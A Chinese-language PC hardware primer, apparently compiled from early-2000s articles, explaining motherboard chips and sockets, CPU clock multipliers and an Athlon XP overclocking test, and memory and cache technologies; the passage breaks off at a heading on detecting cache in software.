4、 系统时钟发生器 CLK 在主板的中间位置有个晶振元件,它会产生一系列高频脉冲波,这些原始的脉冲波再输入到时钟发生器芯片内,经过整形与分频,然后分配给计算机需要的各种频率。
5、 超级输入输出接口芯片 I/O 它一般位于主板的左下方或左上方,主要芯片有Winbond 与ITE,它负责把键盘、鼠标、串口进来的串行数据转化为并行数据。同时也对并口与软驱口的数据进行处理。在我们的维修现场,诸如键盘与鼠标口坏,打印口坏等一些外设不能用,多为I/O芯片坏,有时甚至造成不亮的现象。
6、 声卡芯片 因为现在的主板多数都集成了声卡,而且集成的多为AC’97声卡芯片。当然,也有CMI的8738声卡芯片等。如果你的集成声卡没有声音,这儿坏了的可能性最大。
二、主板上主要的插座

1、CPU插座  目前所有的主板都采用了socket系列零拔力插座。早期的P3采用的socket370插座,现在的P4多采用socket478 插座,早期的P4也有采用socket423插座的,intel 的服务器CPU 如:至强(Xeon)则采用了socket603插座。Intel 对CPU封装格式的不断变化让我们这些fan 们给他送了不少钱啊!不过近日听说intel下一代CPU的封装格式还是采用socket478的格式,这对于不断追求性能的DIYer们来说可是一个好消息啊。

2、内存总线插座 现在市场上我们能见到的内存有SDRAM、DDR SDRAM、RAMBUS三种。SDRAM内存由于DDR内存的价格下调已经逐渐淡出市场,它采用168线插座,中间与左边有两个防反插断口;DDR SDRAM由于非常高的性价比已经成为市场的主流。它采用184线插座,在中间只有一个防反插断口;RAMBUS内存虽然性能好,但是价格一直高踞不下,加上intel已经放弃了对它的支持,所以它的前途至今还只是一个悬念!它的插座采用184线RIMM插座,是在中间有两个防反插断口。
有些客户多次反映在845主板上有时内存认不全的现象,这是因为Iintel 845系列主板只能支持4个Bank (一个Bank可以理解为内存条的一面),在845系列主板上一般设有三个内存插槽,而第二个插槽与第三个插槽共享二个Bank。所以,如果你在第二个与第三个插槽插的内存条为双面的256M,那么就只能认到一个256M。
3、AGP图形总线插座 它位于CPU插座的左边,呈棕色。它的频率为64MHZ。从速度上分为AGP2X,现在的多为AGP4X,也有一些主板已经支持AGP8X。由于不同的速度所需要的电压不同,所以一些主板不亮主要是用户把老的AGP2X显卡插在的新的AGP2X主板上,从而把AGP插座烧坏!令人欣慰的是一些新的主板已经在主板上集成了电压自动调节装置,它可以自动识别显卡的电压。

4、PCI总线插座  它呈现为白色,在AGP插座的旁边,因主板不同,多少不等。它的频率为32MHZ。多插网卡,声卡等其它一些外设。
5、IDE设备接口 它一般位于主板的下面。有四十针八十线。两个IDE口并在一起,有时一个呈绿色,表示它为IDE1。因为系统首先检测IDE1,所以IDE1应该接系统引导硬盘。现在的主板多已支持ATA100,有得支持ATA133,但更高端的主板已经支持串行ATA,它是在并行传输速率无法进一步提高的情况下出现的一种新的、具有更高传输速度的技术,也将是下一代的主流技术。
一口气说了这么多,我已经口干舌燥了,大家再看看自己的主板,是不是感觉它比以前熟悉了多了?哈哈!我们也到说再见的时候了,即然今天说主板,那么我就再说一个关于主板的消息吧,我们技服中心近日接受了一批维修的板子,我们的工程师维修起来特别困难,后来经知情人士指点,才发现这批主板的PCB板边缘都有一个针眼大小的缺口。不仔细看根本分辨不出来。大家可不要小看这个小口中,它是联想对报废主板打的专门的印记!我们居然修复了好多片,我都不得不偑服我们的技术水平了!这可不是自夸的哟!所以,大家买二手主板时可一定要小心啊!

CPU

主要谈谈频率。
1.凡是懂得点电脑的朋友,都应该对'频率'两个字熟悉透了吧!作为机器的核心CPU的频率当然是非常重要的,因为它能直接影响机器的性能。那么,您是否对CPU频率方面的问题了解得很透彻呢?
所谓主频,也就是CPU正常工作时的时钟频率,从理论上讲CPU的主频越高,它的速度也就越快,因为频率越高,单位时钟周期内完成的指令就越多,从而速度也就越快了。但是由于各种CPU内部结构的差异(如缓存、指令集),并不是时钟频率相同速度就相同,比如PIII和赛扬,雷鸟和DURON,赛扬和DURON,PIII与雷鸟,在相同主频下性能都不同程度的存在着差异。目前主流CPU的主频都在600MHz以上,而频率最高(注意,并非最快)的P4已经达到1.7GHz,AMD的雷鸟也已经达到了1.3GHz,而且还会不断提升。
 
  在486出现以后,由于CPU工作频率不断提高,而PC机的一些其他设备(如插卡、硬盘等)却受到工艺的限制,不能承受更高的频率,因此限制了CPU频率的进一步提高。因此,出现了倍频技术,该技术能够使CPU内部工作频率变为外部频率的倍数,从而通过提升倍频而达到提升主频的目的。因此在486以后我们接触到两个新的概念--外频与倍频。它们与主频之间的关系是外频X倍频=主频。一颗CPU的外频与今天我们常说的FSB(Front side bus,前端总线)频率是相同的(注意,是频率相同),目前市场上的CPU的外频主要有66MHz(赛扬系列)、100MHz(部分PIII和部分雷鸟以及所有P4和DURON)、133MHz(部分PIII和部分雷鸟)。值得一提的是,目前有些媒体宣传一些CPU的外频达到了200MHz(DURON)、266MHz(雷鸟)甚至400MHz(P4),实际上是把外频与前端总线混为一谈了,其实它们的外频仍然是100MHz和133MHz,但是由于采用了特殊的技术,使前端总线能够在一个时钟周期内完成2次甚至4次传输,因此相当于将前端总线频率提升了好几倍。不过从外频与倍频的定义来看,它们的外频并未因此而发生改变,希望大家注意这一点。今天外频并未比当初提升多少,但是倍频技术今天已经发展到一个很高的阶段。以往的倍频都只能达到2-3倍,而现在的P4、雷鸟都已经达到了10倍以上,真不知道以后还会不会更高。眼下的CPU倍频一般都已经在出厂前被锁定(除了部分工程样品),而外频则未上锁。部分CPU如AMD的DURON和雷鸟能够通过特殊手段对其倍频进行解锁,而INTEL产CPU则不行。
 
  由于外频不断提高,渐渐地提高到其他设备无法承受了,因此出现了分频技术(其实这是主板北桥芯片的功能)。分频技术就是通过主板的北桥芯片将CPU外频降低,然后再提供给各插卡、硬盘等设备。早期的66MHz外频时代是PCI设备2分频,AGP设备不分频;后来的100MHz外频时代则是PCI设备3分频,AGP设备2/3分频(有些100MHz的北桥芯片也支持PCI设备4分频);目前的北桥芯片一般都支持133MHz外频,即PCI设备4分频、AGP设备2分频。总之,在标准外频(66MHz、100MHz、133MHz)下北桥芯片必须使PCI设备工作在33MHz,AGP设备工作在66MHz,才能说该芯片能正式支持该种外频。
 
  最后再来谈谈CPU的超频。CPU超频其实就是通过提高外频或者倍频的手段来提高CPU主频从而提升整个系统的性能。超频的历史已经很久远(其实也就几年),但是真正为大家所喜爱则是从赛扬系列的出产而开始的,其中赛扬300A超450、366超550直到今天还为人们所津津乐道。而它们就是通过将赛扬CPU的66MHz外频提升到100MHz从而提升了CPU的主频。而早期的DURON超频则与赛扬不同,它是通过破解倍频锁然后提升倍频的方式来提高频率。总的看来,超倍频比超外频更稳定,因为超倍频没有改变外频,也就不会影响到其他设备的正常运作;但是如果超外频,就可能遇到非标准外频如75MHz、83MHz、112MHz等,这些情况下由于分频技术的限制,致使其他设备都不能工作在正常的频率下,从而可能造成系统的不稳定,甚至出现硬盘数据丢失、严重的可能损坏。因此,笔者在这里告诫大家:超频虽有好处,但是也十分危险,所以请大家慎重超频!

2.关于超频
如果是AMD的CPU要超的话就了解一下他的频率极限吧

AMD在不久前发布了它们全新的Athlon XP处理器,其频率分别显XP1500+,1600+,1700+和1800+。为了对抗Intel Pentium4处理器,Athlon XP重新采用了PR值(性能指数)来标称处理器,而Ahlon XP1600+意味着拥有与Pentium 4 1600MHz相同的性能。

Athlon XP采用了全新基于0.18微米制程的Palonmino核心,其核心面积由雷鸟的120mm2增加为128mm2。而封装方式也变为类似FC-PGA PentiumIII的OPGA封装。AMD宣称在采用新核心后 Athlon XP的发热量将较同频的雷鸟低20%。而更低的散热量,自然也就意味着更强劲的超频性能。

所以,我们决定测试一下Athlon XP的超频能力。我们选择了性价比较好的Athlon XP 1600+。它比1800+要便宜许多,但超频能力似乎可以达到1900Mhz以上。

Athlon XP同样有与雷鸟类似的L1桥路,不过已被激光切断,要想超频,首先必须将L1桥路重新相连。具体连接桥路的方式可以参见本站相关文章。由于处理器默认电压为1.75v,要更好的发挥处理器的超频极限,这需要一块具备电压调节功能的主板。我们采用了磐英8K7A和8KHA+进行了对比,尽管8K7A在调节方式上较不便,但超频性能却好于新的8KHA+。

在解频之后,我们首先将倍频设置为6,然后将外频设置为最高,在8K7A下,我们将处理器超至最高200MHz(400MHz DDR)外频,通过200MHz外频下的内存性能测试,我们可以看出超频后的内存带宽已经超出AMD760芯片40%左右。

刚才的测试仅仅只是风冷状态下的结果,这不过是个开始,接下来我们将在极限致冷环境下测试处理器的超频极限。安装上水冷器后。我们将电压调至2.1v。而VDDR调至2.9v。

测试结果令人惊叹,我们最终将处理器稳定于178MHz外频下,此时频率已高达1873.89MHz。

虽然我们希望能突破1900MHz的障碍,但没有成功。同时我们也发现主板对于Athlon XP的超频也致关重要,虽然8KHA+采用更新的芯片组并拥有更好的性能,但在超频能力方面却不如其前辈8K7A。而新核心的Athlon XP超频能力,也得到了验证。


 
内存

1.内存的基础知识
RAM技术词汇

CDRAM-Cached DRAM——高速缓存存储器
CVRAM-Cached VRAM——高速缓存视频存储器
DRAM-Dynamic RAM——动态存储器
EDRAM-Enhanced DRAM——增强型动态存储器
EDO RAM-Extended Date Out RAM——外扩充数据模式存储器
EDO SRAM-Extended Date Out SRAM——外扩充数据模式静态存储器
EDO VRAM-Extended Date Out VRAM——外扩充数据模式视频存储器
FPM-Fast Page Mode——快速页模式
FRAM-Ferroelectric RAM——铁电体存储器
SDRAM-Synchronous DRAM——同步动态存储器
SRAM-Static RAM——静态存储器
SVRAM-Synchronous VRAM——同步视频存储器
3D RAM-3 DIMESION RAM——3维视频处理器专用存储器
VRAM-Video RAM——视频存储器
WRAM-Windows RAM——视频存储器(图形处理能力优于VRAM)
MDRAM-MultiBank DRAM——多槽动态存储器
SGRAM-Signal RAM——单口存储器

存储器有哪些主要技术指标

存储器是具有“记忆”功能的设备,它用具有两种稳定状态的物理器件来表示二进制数码
“0”和“1”,这种器件称为记忆元件或记忆单元。记忆元件可以是磁芯,半导体触发器、 MOS电路或电容器等。
位(bit)是二进制数的最基本单位,也是存储器存储信息的最小单位,8位二进制数称为一
个字节(Byte),可以由一个字节或若干个字节组成一个字(Word)在PC机中一般认为1个或2个字节组成一个字。若干个忆记单元组成一个存储单元,大量的存储单元的集合组成一个 存储体(MemoryBank)。为了区分存储体内的存储单元,必须将它们逐一进行编号,称为地址。地址与存储单元之间一一对应,且是存储单元的唯一标志。应注意存储单元的地址和它里面存放的内容完全是两 回事。
根据存储器在计算机中处于不同的位置,可分为主存储器和辅助存储器。在主机内部,直接
与CPU交换信息的存储器称主存储器或内存储器。在执行期间,程序的数据放在主存储器内。各个存储单元的内容可通过指令随机读写访问的存储器称为随机存取存储器(RAM)。另一种存储器叫只读存储器(ROM),里面存放一次性写入的程序或数据,仅能随机读出。RAM和ROM共同分享主存储器的地址空间。RAM中存取的数据掉电后就会丢失,而掉电后ROM中 的数据可保持不变。因为结构、价格原因,主存储器的容量受限。为满足计算的需要而采用了大容量的辅助存储 器或称外存储器,如磁盘、光盘等.存储器的特性由它的技术参数来描述。

存储容量:存储器可以容纳的二进制信息量称为存储容量。一般主存储器(内存)容量在几十K到几十M字节左右;辅助存储器(外存)在几百K到几千M字节。
存取周期:存储器的两个基本操作为读出与写入,是指将信息在存储单元与存储寄存器(MDR)之间进行读写。存储器从接收读出命令到被读出信息稳定在MDR的输出端为止的时间间隔,称为取数时间TA;两次独立的存取操作之间所需的最短时间称为存储周期TMC。半导 体存储器的存取周期一般为60ns-100ns。
存储器的可*性:存储器的可*性用平均故障间隔时间MTBF来衡量。MTBF可以理解为两次故障之间的平均时间间隔。MTBF越长,表示可*性越高,即保持正确工作能力越强。
性能价格比:性能主要包括存储器容量、存储周期和可*性三项内容。性能价格比是一个综合性指标,对于不同的存储器有不同的要求。对于外存储器,要求容量极大,而对缓冲存储器则要求速度非常快,容量不一定大。因此性能/价格比是评价整个存储器系统很重要的 指标。

SDARM能成为下一代内存的主流吗
快页模式(FPM)DRAM的黄金时代已经过去。随着高效内存集成电路的出现和为优化Pentium 芯片运行效能而设计的INTEL HX、VX等核心逻辑芯片组的支持,人们越来越倾向于采用扩 展数据输出(EDO)DRAM。 EDO DRAM采用一种特殊的内存读出电路控制逻辑,在读写一个地址单元时,同时启动下一个连续地址单元的读写周期。从而节省了重选地址的时间,使存储总线的速率提高到40MHz。也就是说,与快页内存相比,内存性能提高了将近15%~30%,而其制造成本与快页 内存相近。但是EDO内存也只能辉煌一时,其称霸市场的时间将极为短暂。不久以后市场上主流CPU的主频将高达200MHz以上。为优化处理器运行效能,总线时钟频率至少要达到66MHz以上。 多媒体应用程序以及Windows 95和WindowsNT操作系统对内存的要求也越来越高,为缓解 瓶颈,只有采用新的内存结构,以支持高速总线时钟频率,而不至于插入指令等待周期。这样,为适应下一代主流CPU的需要,在理论上速度可与CPU频率同步,与CPU共享一个时钟 周期的同步DRAM(SYNCHRONOUS DRAMS)即SDRAM(注意和用作CACHE的SRAM区别,SRAM的全 写是Static RAM即静态RAM,速度虽快,但成本高,不适合做主存)应运而生,与其它内存 结构相比,性能\价格比最高,势必将成为内存发展的主流。 SDRAM基于双存储体结构,内含两个交错的存储阵列,当CPU从一个存储体或阵列访问数据的同时,另一个已准备好读写数据。通过两个存储阵列的紧密切换,读取效率得到成倍提高。去年推出的SDRAM最高速度可达100MHz,与中档Pentium同步,存储时间高达5~8ns,可将Pentium系统性能提高140%,与Pentium 100、133、166等每一档次只能提高性能百分之几十的CPU相比,换用SDRAM似乎是更明智的升级策略。 在去年初许多DRAM生产厂家已开始上市4MB×4和2MB×8的16MB SDRAM内存条,但其成本 较高。现在每一个内存生产厂家都在扩建SDRAM生产线。预计到今年底和1998年初,随着 64M SDRAM内存条的大量上市,SDRAM将占据主导地位。其价格也将大幅下降。
但是SDRAM的发展仍有许多困难要加以克服,其中之一便是主板核心逻辑芯片组的限制。VX
芯片组已开始支持168线SDRAM,但一般VX主板只有一条168线内存槽,最多可上32M SDRAM,而简洁高效的HX主板则不支持SDRAM。预计下一代Pentium主板芯片组TX将更好的支持SDRAM。Intel最新推出的下一代Pentium主板芯片组TX将更好的支持SDRAM。 SDRAM不仅可用作主存,在显示卡专用内存方面也有广泛应用。对显示卡来说,数据带宽越宽,同时处理的数据就越多,显示的信息就越多,显示质量也就越高。以前用一种可同时进行读写的双端口视频内存(VRAM)来提高带宽,但这种内存成本高,应用受很大限制。因此在 一般显示卡上,廉价的DRAM和高效的EDO DRAM应用很广。但随着64位显示卡的上市,带 宽已扩大到EDO DRAM所能达到的带宽的极限,要达到更高的1600×1200的分辨率,而又尽量降低成本,就只能采用频率达66MHz、高带宽的SDRAM了。
SDRAM也将应用于共享内存结构(UMA)——一种集成主存和显示内存的结构。这种结构在很 大程度上降低了系统成本,因为许多高性能显示卡价格高昂,就是因为其专用显示内存成本极高,而UMA技术将利用主存作显示内存,不再需要增加专门显示内存,因而降低了成本。

什么是Flash Memory 存储器
介绍关于闪速存储器有关知识 近年来,发展很快的新型半导体存储器是闪速存储器(Flash Memory)。它的主要特点是在不加电的情况下能长期保持存储的信息。就其本质而言,Flash Memory属于EEPROM(电擦除可编程只读存储器)类型。它既有ROM的特点,又有很高的存取速度,而且易于擦除和重写, 功耗很小。目前其集成度已达4MB,同时价格也有所下降。
由于Flash Memory的独特优点,如在一些较新的主板上采用Flash ROM BIOS,会使得BIOS 升级非常方便。 Flash Memory可用作固态大容量存储器。目前普遍使用的大容量存储器仍为硬盘。硬盘虽有容量大和价格低的优点,但它是机电设备,有机械磨损,可*性及耐用性相对较差,抗冲击、抗振动能力弱,功耗大。因此,一直希望找到取代硬盘的手段。由于Flash Memory集成度不断提高,价格降低,使其在便携机上取代小容量硬盘已成为可能。 目前研制的Flash
Memory都符合PCMCIA标准,可以十分方便地用于各种便携式计算机中以取代磁盘。当前有两种类型的PCMCIA卡,一种称为Flash存储器卡,此卡中只有Flash Memory芯片组成的存储体,在使用时还需要专门的软件进行管理。另一种称为Flash驱动卡,此卡中除Flash芯片外还有由微处理器和其它逻辑电路组成的控制电路。它们与IDE标准兼容,可在DOS下象硬盘一样直接操作。因此也常把它们称为Flash固态盘。 Flash Memory不足之处仍然是容量还不够大,价格还不够便宜。因此主要用于要求可*性高,重量轻,但容量不大的便携式系统中。在586微机中已把BIOS系统驻留在Flash存储 器中。

什么是Shadow RAM 内存
Shadow RAM也称为“影子”内存。它是为了提高系统效率而采用的一种专门技术。 Shadow RAM所使用的物理芯片仍然是CMOS DRAM(动态随机存取存储器)芯片。Shadow RAM 占据了系统主存的一部分地址空间。其编址范围为C0000~FFFFF,即为1MB主存中的768KB~1024KB区域。这个区域通常也称为内存保留区,用户程序不能直接访问。 Shadow RAM的功能是用来存放各种ROM
BIOS的内容。或者说Shadow RAM中的内容是ROM BIOS的拷贝。因此也把它称为ROM Shadow(即Shadow RAM的内容是ROM BIOS的“影 子”)。 在机器上电时,将自动地把系统BIOS、显示BIOS及其它适配器的BIOS装载到Shadow RAM 的指定区域中。由于Shadow RAM的物理编址与对应的ROM相同,所以当需要访问BIOS时, 只需访问Shadow RAM即可,而不必再访问ROM。 通常访问ROM的时间在200ns左右,而访问DRAM的时间小于100ns(最新的DRAM芯片访问时间为60ns左右或者更小)。在系统运行的过程中,读取BIOS中的数据或调用BIOS中的程序模块是相当频繁的。显然,采用了Shadow技术后,将大大提高系统的工作效率。 按下按键你可以看到该地址空间分配图,在如图所示的1MB主存地址空间中,640KB以下的区域是常规内存。640KB~768KB区域保留为显示缓冲区。768KB~1024KB区域即为Shadow RAM区。在系统设置中,又把这个区域按16KB大小的尺寸分为块,由用户设定是否允许使 用。 C0000~C7FFF这两个16KB块(共32KB )通常用作显示卡的ROM BIOS的Shadow区。 C8000~EFFFF这10个16KB块可作为其它适配器的ROM BIOS的Shadow区。F0000~FFFFF 共64KB规定由系统ROM BIOS使用。 应该说明的是,只有当系统配置有640KB以上的内存时才有可能使用Shadow RAM。在系统内存大于640KB时,用户可在CMOS设置中按照ROM Shadow分块提示,把超过640KB以上的 内存分别设置为“允许”(Enabled)即可。

什么是EDO RAM
内存是计算机中最主要的部件之一。微机诞生以来,它的心脏--CPU几经改朝换代,目前已
发展到了PentiumⅡ,较之于当初,它在速度上已有两个数量级的增长。而内存的构成器件RAM(随机存储器)--一般为DRAM(动态随机存储器),虽然单个芯片的容量不断扩大,但存取速度并没有太大的提高。虽然人们早就采用高速但昂贵的SRAM芯片在CPU和内存之间增加一种缓冲设备--Cache,以缓冲两者之间的速度不匹配问题。但这并不能根本解决问题。于 是人们把注意力集中到DRAM接口(芯片收发数据的途径上)。
在RAM芯片之中,除存储单元之外,还有一些附加逻辑电路,现在,人们已注意到RAM芯片
的附加逻辑电路,通过增加少量的额外逻辑电路,可以提高在单位时间内的数据流量,即所 谓的增加带宽。EDO正是在这个方面作出了尝试。
扩展数据输出(Extended data out--EDO,有时也称为超页模式--hyper-page-mode)DRAM,和突发式EDO(Bust EDO-BEDO)DRAM是两种基于页模式内存的内存技术。EDO大约一年前被
引入主流PC,从那以后成为许多系统厂商的主要内存选择。BEDO相对更新一些,对市场的 吸引还未能达到EDO的水平。 EDO的工作方式颇类似于FPM DRAM:先触发内存中的一行,然后触发所需的那一列。但是当 找到所需的那条信息时,EDO DRAM不是将该列变为非触发状态而且关闭输出缓冲区(这是FPM DRAM采取的方式),而是将输出数据缓冲区保持开放,直到下一列存取或下一读周期开始。由于缓冲区保持开放,因而EDO消除了等待状态,且突发式传送更加迅速。 EDO还具有比FPM DRAM的6-3-3-3更快的理想化突发式读周期时钟安排:6-2-2-2。这使得在66MHz总线上从DRAM中读取一组由四个元素组成的数据块时能节省3个时钟周期。EDO 易于实现,而且在价格上EDO与FPM没有什么差别,所以没有理由不选择EDO。 BEDO DRAM比EDO能更大程度地改善FPM的时钟周期。由于大多数PC应用程序以四周期突 发方式访问内存,以便填充高速缓冲内存 (系统内存将数据填充至L2高速缓存,如果没有 L2高速缓存,则填充至CPU),所以一旦知道了第一个地址,接下来的三个就可以很快地由 DRAM提供。BEDO最本质的改进是在芯片上增加了一个地址计数器,用来跟踪下一个地址。 BEDO还增加了流水线级,允许页访问周期被划分为两个部分。对于内存读操作,第一部分负责将数据从内存阵列中读至输出级(第二级锁存),第二部分负责从这一锁存将数据总线驱动至相应的逻辑级别。因为数据已经在输出缓冲区内,所以访问时间得以缩短。BEDO能达到的最大突发式时钟安排为5-1-1-1(采用52nsBEDO和66-MHz总线)比优化EDO内存又节省 了四个时钟周期。

RAM是如何工作的
实际的存储器结构由许许多多的基本存储单元排列成矩阵形式,并加上地址选择及读写控制
等逻辑电路构成。当CPU要从存储器中读取数据时,就会选择存储器中某一地址,并将该地 址上存储单元所存储的内容读走。
早期的DRAM的存储速度很慢,但随着内存技术的飞速发展,随后发展了一种称为快速页面 模式(Fast Page Mode)的DRAM技术,称为FPDRAM。FPM内存的读周期从DRAM阵列中某一行的触发开始,然后移至内存地址所指位置的第一列并触发,该位置即包含所需要的数据。第一条信息需要被证实是否有效,然后还需要将数据存至系统。一旦发现第一条正确信息,该列即被变为非触发状态,并为下一个周期作好准备。这样就引入了“等待状态”,因为在该列为非触发状态时不会发生任何事情(CPU必须等待内存完成一个周期)。直到下一周期开始或下一条信息被请求时,数据输出缓冲区才被关闭。在快页模式中,当预测到所需下一条数据所放位置相邻时,就触发数据所在行的下一列。下一列的触发只有在内存中给定行上进行 顺序读操作时才有良好的效果。
从50纳秒FPM内存中进行读操作,理想化的情形是一个以6-3-3-3形式安排的突发式周期(6个时钟周期用于读取第一个数据元素,接下来的每3个时钟周期用于后面3个数据元素)。第一个阶段包含用于读取触发行列所需要的额外时钟周期。一旦行列被触发后,内存 就可以用每条数据3个时钟周期的速度传送数据了。 FP RAM虽然速度有所提高,但仍然跟不上新型高速的CPU。很快又出现了EDO RAM和SDRAM等新型高速的内存芯片。

介绍处理器高速缓存的有关知识

所谓高速缓存,通常指的是Level 2高速缓存,或外部高速缓存。L2高速缓存一直都属于
速度极快而价格也相当昂贵的一类内存,称为SRAM(静态RAM),用来存放那些被CPU频繁使 用的数据,以便使CPU不必依赖于速度较慢的DRAM。
最简单形式的SRAM采用的是异步设计,即CPU将地址发送给高速缓存,由缓存查找这个地
址,然后返回数据。每次访问的开始都需要额外消耗一个时钟周期用于查找特征位。这样,异步高速缓存在66MHz总线上所能达到的最快响应时间为3-2-2-2,而通常只能达到4-2-2-2。同步高速缓存用来缓存传送来的地址,以便把按地址进行查找的过程分配到两个或更多个时钟周期上完成。SRAM在第一个时钟周期内将被要求的地址存放到一个寄存器中。在第二个时钟周期内,SRAM把数据传送给CPU。由于地址已被保存在一个寄存器中,所以接下来同步SRAM就可以在CPU读取前一次请求的数据同时接收下一个数据地址。这样,同步SRAM可以不必另花时间来接收和译码来自芯片集的附加地址,就“喷出”连续的数据元素。优化 的响应时间在66MHz总线上可以减小为2-1-1-1。
另一种类型的同步SRAM称为流水线突发式(pipelined burst)。流水线实际上是增加了一个 用来缓存从内存地址读取的数据的输出级,以便能够快速地访问从内存中读取的连续数据,而省去查找内存阵列来获取下一数据元素过程中的延迟。流水线对于顺序访问模式,如高速 缓存的行填充(linefill)最为高效。

什么是ECC内存
ECC是Error Correction Coding或Error Cheching and Correcting的缩写,它代表具有自动纠错功能的内存。目前的ECC存储器一般只能纠正一位二进制数的错误。 Intel公司的82430HX芯片组可支持ECC内存,所以采用82430HX芯片的主板一般都可以安装使用ECC内存,由于ECC内存成本比较高,所以它主要应用在要求系统运算可*性比较高 的商业计算机中。由于实际上存储器出错的情况不会经常发生,所以一般的家用计算机不必采用ECC内存,还有不少控制电路芯片不能支持ECC内存,所以有不少主机是不宜安装ECC内存的,用户应注 意对ECC内存不要盲从。

SDRAM能与EDO RAM混用吗
SDRAM是新一代的动态存储器,又称为同步动态存储器或同步DRAM。它可以与CPU总线使用 同一个时钟,而EDO和FPM存储器则与CPU总线是异步的。目前SDRAM存储器的读写周期一般为5-1-1-1。相比之下,EDO内存器一般为6-2-2-2。也就是说,SDRAM的读写周期比EDO少4个,大约节省存储器读写时间28%,但实际上由于计算机内其它设备的制约,使用 SDRAM的计算机大约可提高性能5~10%。 虽然有不少主机支持SDRAM与EDO内存混合安装方式,但是最好不要混用。原因是多数SDRAM只能在3.3V下工作,而EDO内存则多数在5V下工作。虽然主机板上对DIMM和SIMM分别供电,但它们的数据线总是要连在一起的,如果SIMM(72线内存)与DIMM(168线SDRAM)混用,尽管开始系统可以正常工作,但可能在使用一段时间后,会造成SDRAM的数据输入端 被损坏。
当然,如果你的SDRAM是宽电压(3V~5V)工作的产品,就不会出现这种损坏情况。目前T1和SUMSUNG的某些SDRAM产品支持宽电压工作方式,可以与EDO内存混用。

高速缓存--Cache 介绍Cache的分级
随着CPU的速度的加快,它与动态存储器DRAM配合工作时往往需要插入等待状态,这样难以发挥出CPU的高速度,也难以提高整机的性能。如果采用静态存储器,虽可以解决该问题,但SRAM价格高。在同样容量下,SARM的价格是DRAM的4倍。而且SRAM体积大,集成 度低。为解决这个问题,在386DX以上的主板中采用了高速缓冲存储器--Cache技术。其基本思想是用少量的SRAM作为CPU与DRAM存储系统之间的缓冲区,即Cache系统。80486以及更高档微处理器的一个显著特点是处理器芯片内集成了SRAM作为Cache,由于这些Cache装在芯片内,因此称为片内Cache。486芯片内Cache的容量通常为8K。高档芯片 如Pentium为16KB,PowerPC可达32KB。Pentium微处理器进一步改进片内Cache,采用数据和双通道Cache技术,相对而言,片内Cache的容量不大,但是非常灵活、方便,极大地提高了微处理器的性能。片内Cache也称为一级Cache。由于486,586等高档处理器的时钟频率很高,一旦出现一级Cache未命中的情况,性能将
明显恶化。在这种情况下采用的办法是在处理器芯片之外再加Cache,称为二级Cache。二级Cache实际上是CPU和主存之间的真正缓冲。由于系统板上的响应时间远低于CPU的速度,如果没有二级Cache就不可能达到486,586等高档处理器的理想速度。二级Cache的容量通常应比一级Cache大一个数量级以上。在系统设置中,常要求用户确定二级Cache是否安装及尺寸大小等。二级Cache的大小一般为128KB、256KB或512KB。在486以上档次的微机中,普遍采用256KB或512KB同步Cache。所谓同步是指Cache和CPU采用了相同的时钟周期,以相同的速度同步工作。相对于异步Cache,性能可提高30% 以上。

什么是CACHE存储器
所谓Cache,即高速缓冲存储器,是位于CPU和主存储器DRAM(Dynamic RAM)之间的规模较 小的但速度很高的存储器,通常由SRAM组成。SRAM(Static RAM)是静态存储器的英文缩写。由于SRAM采用了与制作CPU相同的半导体工艺,因此与动态存储器DRAM比较,SRAM 的存取速度快,但体积较大,价格很高。由于动态RAM组成的主存储器的读写速度低于CPU 的速度,而CPU每执行一条指令都要访问一次或多次主存,所以CPU总是要处于等待状态,严重地降低了系统的效率。采用Cache之后,在Cache中保存着主存储器内容的部分副本,CPU在读写数据时,首先访问Cache。由于Cache的速度与CPU相当,因此CPU就能在零等待状态下迅速地完成数据的读写。只有Cache中不含有CPU所需的数据时,CPU才去访问主存。CPU在访问Cache时找到所需的数据称为命中,否则称为未命中。因此,访问Cache的命中率则成了提高效率的关键。而提高命中率则取决于Cache存储器的映象方式和Cache内 容替换的算法等一系列因素。

对内存扩容时应遵循哪些规则

对内存扩充容量时,应遵循下面的一些规则:
1.对大多数PC机来说,不能在同一组Bank内(每组包括两到四个插座)将不同大小的SIMM条混合在一起。很多PC机都可安装不同容量的SIMM,但装在PC机同一组中的所有SIMM必须具有相同的容量,例如,对一个四插槽组来说,PC机一般既可接受1MB的SIMM条,也可 接受4MB的SIMM条,可在该组的每个槽内安装1MB SIMM,则这一组共可容纳4MB内存。也 可在该组每个槽内安装4MB SIMM,则这一组共可容纳16MB内存。但是,不能为了得到10MB内存,在两个槽内插入1MB的SIMM条,而在另两个槽中插入4MB的SIMM条。

2.对于很多PC机来说,若把不同速度的SIMM混合在一起,即使它们的容量相同也会带来麻烦。例如,计算机中已有运行速度为60纳秒(ns)的4MB内存,而文档中说70ns的SIMM也能工作。如果在母板的空闲内存槽中再插入速度为70ns的SIMM条,机器会拒绝引导或在启动后不久就陷于崩溃。对于某些机器来说,若把速度低的SIMM放至第一组,则可解决速度 混合问题。计算机会按最低速度存取,剩余部分不会再有用。

3.对于大多数PC机来说,必须将一组的所有插槽都插满。或者将一组全部置空(当然第一组 不行)。在一组中不能只装一部分。

4.PC机可接受的SIMM大小有一个上限(最大值可从PC机说明书中找到。若没有说明书,唯 一的方法就是从实践中找到最大值了)。何谓30线、72线、168线内存条 内存条;30线;72线;168线 介绍30线、72线、168线内存条的有关知识及相互之间的区别条形存储器是把一些存储器芯片焊在一小条印制电路板上做成的,即称之为内存条,所谓内存条线数即引脚数,按引脚数不同可把内存条分为30线的内存条、72线的内存条(SIMM, 即Sigle inline Memory Modale)和168线的内存条(DIMM,即Double inline Memory Module)。内存条的引脚数必须与主板上内存槽的插脚数相匹配,内存条插槽也有30线、72 线和168线三种。30线内存条提供8位有效数据位。常见容量有256KB、1MB和4MB。72线的内存条体积稍大,提供32位的有效数据位。常见容量有4MB、8MB、16MB和32MB。按下按键你可以看到72线内存条的外观形状。 168线的内存条体积较大,提供64位有效数据位。

如何识别Cache存储器芯片标志
目前微机系统中,常用的静态RAM的容量有8K×8位(64Kbit)、32K×8(256Kbit)位以及64K×8(512Kbit)位三种芯片,存取时间(周期)为15ns到30ns。以上参数在静态SRAM芯片上常标注为:XX64-25(XX65-25)、XX256-15(XX257-15)、XX512-15等。以XX256-15为例,其中“256”表示容量(单位为Kbit),“15”表示存取时间(单位为 ns)。在表示SRAM存储器容量的数值中,“64”与“65”相同,都表示该芯片的容量为64Kbit,即8KB。同理,“256”与“257”的含义也相同,即该芯片的容量为32KB。例如在华硕PVI686SP3主板上使用的SRAM芯片为W24257AK-15,即该芯片的容量为32K×8位,存取速 度为15ns。

如何用软件的方法检测Cache?
